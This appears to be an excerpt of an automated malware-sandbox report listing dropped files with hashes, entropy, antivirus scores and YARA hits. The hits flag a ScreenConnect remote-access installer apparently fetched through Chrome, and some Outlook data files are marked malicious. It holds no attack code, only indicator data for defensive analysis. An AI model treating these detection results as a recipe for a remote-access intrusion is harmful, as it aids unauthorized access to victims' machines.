                                                                                                                          SHA-512:BB1FE94A523EF108C49F75DA187FCC28BBF80D72233454C329134BEE2E12268D3DA344A622987B081612AA2A1EDAC8B91EEF27619C7309517AC52E7AEBF32F1A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..function OnLoad()..{.. ViewPanel.addBehavior("#default#mmcview");.. MMCEvents.ConnectTo(external.Document.Application);.. UpdateState();..}....// Prevent text from being selected and messing up the UI...function document.onselectstart()..{.. event.returnValue = false;..}....function UpdateState()..{.. var strDetails = "";.. var strDisplayName = "";.. var strDescription = "";.. var i;.. var curnode;.. var strNodeType;.... N = external.Selection;.... switch(N.count).. {.. case 0:.. DisplayNameElem.style.fontWeight="normal";.. strDetails = "";.. strDisplayName = L_strNoItemSelected_Text;.. break;.... case 1:.. DisplayNameElem.style.fontWeight="bold";.. strDetails = "";.. curNode = N(1);.... // got the selected node.. strNodeType = curNode.Nodetype;.. strDisplayName = external.CellContents(curNode, 1);.. strDescription = curNode.Property("CCF_DESCRIPTION");..
                                                                                                                          Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):180025
                                                                                                                          Entropy (8bit):5.29668201419059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:35167385829C6E71CBE9EC51CC43220B
                                                                                                                          SHA1:30B8A7D3ABD3CF678B82E37986FEAAD9B407D56E
                                                                                                                          SHA-256:45A725CAFBE202D49BDD43582CB7C1C44610B1FD69274BED21CCEEDE06B9C945
                                                                                                                          SHA-512:3047CBA8AFFBEF5CD4DEA1446BB983028A6CEC40F7ED0BAEF05FAD90F1224F9339C888A8E57954F44E2F2BD956630C9A58600CD1A8A737B467289A87E67FA01B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2025-03-07T22:32:57">.. Build: 16.0.18413.40127-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results?fullframe=yes</o:url>.. <o:ticket o:policy="DELEGATION" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Bearer {}" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.Resourc
                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1088808
                                                                                                                          Entropy (8bit):7.794014860337275
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:4ABAD4FD1A22BC922B457C28D1E40F1A
                                                                                                                          SHA1:FC5A486B121175B547F78D9B8FC82FD893FCF6ED
                                                                                                                          SHA-256:DB51E4B70F27D0BF28789EA3345BF693035916461D22661C26F149C5BC8891ED
                                                                                                                          SHA-512:21D52CCF5B5041319A007F72C5CD5830F2A99E7B0AB2B946A87A25ADEBB78D6FBE1FF95A01F26E530A0D30D838560D8ACF716E0C43AEB5AD69334A897456A5A1
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):234
                                                                                                                          Entropy (8bit):4.977464602412109
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                                                          SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                                                          SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                                                          SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):4.62694170304723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                                                          SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                                                          SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                                                          SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):36864
                                                                                                                          Entropy (8bit):4.340550904466943
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                                                          SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                                                          SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                                                          SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):57344
                                                                                                                          Entropy (8bit):4.657268358041957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                                                          SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                                                          SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                                                          SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):176128
                                                                                                                          Entropy (8bit):5.775360792482692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                                          SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                                          SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                                          SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11776
                                                                                                                          Entropy (8bit):5.276434818345727
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7572B9AE2ECF5946645863A828678B5A
                                                                                                                          SHA1:438A5BE706775626768D24BA5F25C454920AD2F2
                                                                                                                          SHA-256:D09447D4816E248C16891361D87019156CC7664B213357A8E6C422484B8D6B4E
                                                                                                                          SHA-512:B1CEE9458BE3579A02B6F7E8D0B76F67A4B2D1F170DB2E09AF75D9901723E80E68650FE8FBBE43C8F062DF7D50889E224B7CD9767027A0D7A5121A4534F2AFA4
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726976
                                                                                                                          Entropy (8bit):6.6400445410513145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7099C67FE850D902106C03D07BFB773B
                                                                                                                          SHA1:F597D519A59A5FD809E8A1E097FDD6E0077F72DE
                                                                                                                          SHA-256:2659F660691D65628D2FCC3BFC334686CD053F162CDB73BF7A0DA0AC6449DB92
                                                                                                                          SHA-512:17849CB444D3AC2CD4658D4ECA9DC89652BEAE6C6A2BD765749D8BA53E37248FD92A00AF2B45371C21182135FFFA6DD96DC9570BFD41459F23E084C3E122D162
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):90112
                                                                                                                          Entropy (8bit):4.475749173992463
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:95F6CB8E0AB8C67F4C76E1AF97A18151
                                                                                                                          SHA1:BA2413B4C4103C109798EE69C821B92CAD58C4A2
                                                                                                                          SHA-256:0FB819C9D688588513C30DEA91EF069B84A2ACF027AEB25F3E63D90A760FD957
                                                                                                                          SHA-512:232FD6098D01F8C708791DAB73E701702F7F0E88937BD8651AE0CFF2D549E8BA30F1D6B37FBAD643ABC4AFE85A3AE6CEB7BEF3D4A74D01EA970638AF21F5DE2B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:GIF image data, version 89a, 15 x 15
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):663
                                                                                                                          Entropy (8bit):5.949125862393289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                          SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                          SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                          SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):163840
                                                                                                                          Entropy (8bit):0.46720383620404843
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:0C0503D44042B7883ED2203780DF4CC2
                                                                                                                          SHA1:AB04ED6888C24A8573E99E3467A7BDFA1F58F0EE
                                                                                                                          SHA-256:44D02EE2804A17197621355790380ED853C3C30893DAA42B1B431EB787471A1F
                                                                                                                          SHA-512:D8496D93721F01123FE95970E0818E1036A49A802AA693602DD5C2FCF6814BD5F5A3272ACB6B6681A5E36222991B05BCDF4286812C907183FF9F54F60B6DAF43
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):271360
                                                                                                                          Entropy (8bit):1.5027795538163893
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:71EEA40A5EE35845C7139443CBD77D8F
                                                                                                                          SHA1:BF0D5C8D828245025FC7D7096DC313872F47404E
                                                                                                                          SHA-256:BF28709B84D2D6685F29A2EE67292C2C348618C5B30BA5BCCBB43BBE94CCDE3D
                                                                                                                          SHA-512:7E50DD0C1BE7C4DD8C82C096F94412E1234A2B47F7F850360F1CD37BF6F45DA0C25F777585635D0B3EC76088E39D76D796BDE8A5488144BC7E112E628F555DB9
                                                                                                                          Malicious:true
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131072
                                                                                                                          Entropy (8bit):1.0189936431520732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:62097054111037E452F31ED4DB42E565
                                                                                                                          SHA1:5D098B0A987AE3F82B0BEC777C4427657CD51B89
                                                                                                                          SHA-256:4F8C1E4B54D1AD1376BE3C73ABC3249F23ED1ACF04016B94BBEE82AD209A023A
                                                                                                                          SHA-512:1504070BDBD987E33C63C4EF38B38A97EC31AB9C15B40AC61FE2AB1FE03533509FE20B390415009943086F0A5999F4E23A8FD1C890C19A001BC3885A041D91F5
                                                                                                                          Malicious:true
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34269
                                                                                                                          Entropy (8bit):6.497594965464524
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7BE7E5F05B811BBE825E8C26D5F01995
                                                                                                                          SHA1:70006841AF9C8245DC9B64C34BA5E90B8B696C7D
                                                                                                                          SHA-256:22FE94D19E25F3654C9A37FDD5DCE91F5872B4315B8030505820797EA247AC99
                                                                                                                          SHA-512:02051CE1CAFEC2E2649EC36722AAB2844764764B1451ECF508905700825746A6BF954D8D5B0F616B3F54304E3692EB12E552B091D8721404EC58DBFB17B98625
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE833A8BD46CB8C28B9D2AF97030E676
                                                                                                                          SHA1:263E317B6E026399DC272A26CBAC6569E4095BFF
                                                                                                                          SHA-256:AD53C37F7F554A3D4D2D26D3CD445D764048712136DD2F2EEA1640939913AB59
                                                                                                                          SHA-512:E8E7078A810751408874CF41CB4971BB50250A7D38FA5CF07CA2BCE3D4E9A90A208CB426059F3DCA39B7714F065006CDEB52A575369A50CC73C6294B30D13CEB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:911525671C9FD23005A07459B729B754
                                                                                                                          SHA1:82962D1876B03561895156C22A6E68925E01418D
                                                                                                                          SHA-256:67B909BBCCE486BABA59D66E3B4EC4C74DD64782051A41198085A5B3450D00C9
                                                                                                                          SHA-512:E6666C83C3C817B2E378C13D04182013F9A44205B05755DBF41CEE64D49DF32E509D12BF17134F0529CBDE52C2C6A51BFD7CC60D013264827FEE2F2D56330C70
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5628960
                                                                                                                          Entropy (8bit):7.430705315269971
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:911525671C9FD23005A07459B729B754
                                                                                                                          SHA1:82962D1876B03561895156C22A6E68925E01418D
                                                                                                                          SHA-256:67B909BBCCE486BABA59D66E3B4EC4C74DD64782051A41198085A5B3450D00C9
                                                                                                                          SHA-512:E6666C83C3C817B2E378C13D04182013F9A44205B05755DBF41CEE64D49DF32E509D12BF17134F0529CBDE52C2C6A51BFD7CC60D013264827FEE2F2D56330C70
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE833A8BD46CB8C28B9D2AF97030E676
                                                                                                                          SHA1:263E317B6E026399DC272A26CBAC6569E4095BFF
                                                                                                                          SHA-256:AD53C37F7F554A3D4D2D26D3CD445D764048712136DD2F2EEA1640939913AB59
                                                                                                                          SHA-512:E8E7078A810751408874CF41CB4971BB50250A7D38FA5CF07CA2BCE3D4E9A90A208CB426059F3DCA39B7714F065006CDEB52A575369A50CC73C6294B30D13CEB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3995610
                                                                                                                          Entropy (8bit):7.324865565216482
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE833A8BD46CB8C28B9D2AF97030E676
                                                                                                                          SHA1:263E317B6E026399DC272A26CBAC6569E4095BFF
                                                                                                                          SHA-256:AD53C37F7F554A3D4D2D26D3CD445D764048712136DD2F2EEA1640939913AB59
                                                                                                                          SHA-512:E8E7078A810751408874CF41CB4971BB50250A7D38FA5CF07CA2BCE3D4E9A90A208CB426059F3DCA39B7714F065006CDEB52A575369A50CC73C6294B30D13CEB
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\eda2c7bf-7eeb-4af6-a518-8725894275d2.tmp, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4B6C036E-28DA-1655-4F4C-DB2C91ACA822}, Create Time/Date: Wed Dec 18 21:40:44 2024, Last Saved Time/Date: Wed Dec 18 21:40:44 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13361152
                                                                                                                          Entropy (8bit):7.969161188685618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:341EB858232111D75C8F6B83E99EA758
                                                                                                                          SHA1:A15296235E7E10618F6888F2AE529B2FA0636DFF
                                                                                                                          SHA-256:9CA84CCEDA9BB56D2D37490145FF8A1C8F4A557188112CC9CCE4FA6C18BB1506
                                                                                                                          SHA-512:2452C408F8682A469D89E48423E8E80B338C422DA63315C9C1AAC03F2B54CD02A2BF7327648CEA1050E07526388E8D9E70863A13E9107927DAC37FDC6F129646
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):423907
                                                                                                                          Entropy (8bit):6.577418641651606
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:8F7D9AFE3859615D84F35C722692241E
                                                                                                                          SHA1:10E1F00608A545C35F502930C708CBB65B9A2618
                                                                                                                          SHA-256:D1A0C9130F20CE5304B5AEBF7714EBF07EA8EDA986C84D8F366E68BB0B851FE6
                                                                                                                          SHA-512:E5644540BE6EB84B639711003AA371C7DCA4DD94F1583C267999E2987829B0C21C8980D2A4D45EA459FB0F3365F49AAEF79363EEF72CD9DFAB912A05CEA3F46C
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI4F17.tmp, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...@IXOS.@.....@=.gZ.@.....@.....@.....@.....@.....@......&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}'.ScreenConnect Client (d241e538b9eb3f0a)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (d241e538b9eb3f0a)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{D2F68EAD-292A-9089-63C0-8EAF92A6C63B}^.C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{BD5627A3-7902-96F8-0A61-8DBE6A166677}f.C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{0D7A6851-490B-572E-514A-79D15C14EAE4}c.C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileMa
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):207360
                                                                                                                          Entropy (8bit):6.573348437503042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.1724533911885513
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:4B29D33671D2582F20CE02F5DEBF09A4
                                                                                                                          SHA1:248AA2DC49842F0F52D1DAEEE9E1C8E2AC0CE332
                                                                                                                          SHA-256:0FCEAED4998081589CD78AAC443ADA053C50B47B1CD59EFFACEFB73F5F9CDEE8
                                                                                                                          SHA-512:14B016E0C11C2EE4DBE93E4D1C852D654F91D70815B7311194BEF3269E6D040F9F881FA2F1C891466B87D44AE08295F9E5A43184000257E1FCC92C03FFF4F168
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.8129754009103798
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:509B05754D941EE8ACD3186E545F344C
                                                                                                                          SHA1:F66DD244E7DAF2BECEABE1B60F9EF12579252942
                                                                                                                          SHA-256:7E3CE911A8C0F18157EDDF55C893BEEB8CAE975D647AE2FBB1EF57CF1A99943C
                                                                                                                          SHA-512:F1F9D885756580871239B8251CD63FE8B2E2CCA77650A290C6A9EC522B87B48F0448EA04F93F2BD2B3DB66D0C9C640F738904173CB90D7B2D8ABE4FA10D138E7
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):435
                                                                                                                          Entropy (8bit):5.289734780210945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                                          SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                                          SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                                          SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):454234
                                                                                                                          Entropy (8bit):5.356157423829987
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:B607A60EA0CA8C5406A3F743C122C3F0
                                                                                                                          SHA1:8866ACD914BCA8AB17AB8CC4B5A27A24CF0BE4A4
                                                                                                                          SHA-256:B5F1168C1DE186E5EC8C84754C9D6271E3F85B3E938617189C2377588A38E712
                                                                                                                          SHA-512:58E7FA22482574F63D1B7D0D02B30689CDD9C4E2F4B8A3ED928ACCAFF84705212D56E326DACDEA5C8D682F08C28B83D38161F87690AD74F92B318BAC53997AA2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
